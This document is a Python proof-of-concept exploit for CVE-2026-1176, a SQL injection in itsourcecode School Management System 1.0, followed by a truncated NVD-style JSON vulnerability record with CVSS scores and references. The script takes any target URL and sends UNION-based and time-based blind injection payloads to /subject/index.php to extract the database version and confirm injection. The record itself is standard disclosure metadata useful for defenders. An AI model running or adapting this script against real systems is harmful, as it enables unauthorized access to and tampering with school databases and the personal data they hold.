CVE-2026-1176

import requests import sys # CVE-2026-1176 SQL Injection PoC # Target: itsourcecode School Management System 1.0 # File affected: /subject/index.php # Parameter: ID def exploit_sql_injection(target_url, param_id): """ SQL Injection PoC for CVE-2026-1176 Test with boolean-based blind injection """ # Original request original_url = f"{target_url}/subject/index.php?ID={param_id}" # Test payload - extract database version # Using UNION-based injection payload = f"{param_id}' UNION SELECT NULL,NULL,version(),NULL,NULL---" test_url = f"{target_url}/subject/index.php?ID={payload}" print(f"[*] Target: {target_url}") print(f"[*] Testing payload: {payload}") try: response = requests.get(test_url, timeout=10) if response.status_code == 200: print(f"[+] Response received (Status: {response.status_code})") print(f"[+] Length: {len(response.text)} bytes") return response.text except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None def extract_database_info(target_url): """ Extract database information using time-based blind injection """ # Time-based blind injection payload # Adjust sleep time based on database type payloads = [ "1' AND SLEEP(5)-- -", # MySQL time-based "1'; SELECT pg_sleep(5)--" # PostgreSQL time-based ] for payload in payloads: url = f"{target_url}/subject/index.php?ID={payload}" print(f"[*] Testing: {url}") try: response = requests.get(url, timeout=15) print(f"[+] Request completed") except requests.exceptions.Timeout: print(f"[+] Time-based injection confirmed (sleep executed)") break if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-1176.py <target_url>") print("Example: python cve-2026-1176.py http://target.com/school") sys.exit(1) target = sys.argv[1].rstrip('/') print("CVE-2026-1176 SQL Injection PoC") print("=" * 50) # Test basic injection exploit_sql_injection(target, "1") # Test blind injection extract_database_info(target)

{"cve": {"id": "CVE-2026-1176", "sourceIdentifier": "[email protected]", "published": "2026-01-19T21:15:50.587", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in itsourcecode School Management System 1.0. Affected is an unknown function of the file /subject/index.php. Performing a manipulation of the argument ID results in sql injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks."}, {"lang": "es", "value": "Se ha descubierto una falla de seguridad en itsourcecode School Management System 1.0. Afectada es una función desconocida del archivo /subject/index.php. Realizar una manipulación del argumento ID resulta en inyección SQL. Es posible iniciar el ataque de forma remota. El exploit ha sido publicado y puede ser utilizado para ataques."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:itsourcecode:school_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "D4F6842D-98A5-4EDC-9580-D40F28FCB304"}]}]}], "references": [{"url": "https://github.com/ltranquility/CVE/issues/32", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.341770", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341770", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.736477", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry ... (truncated)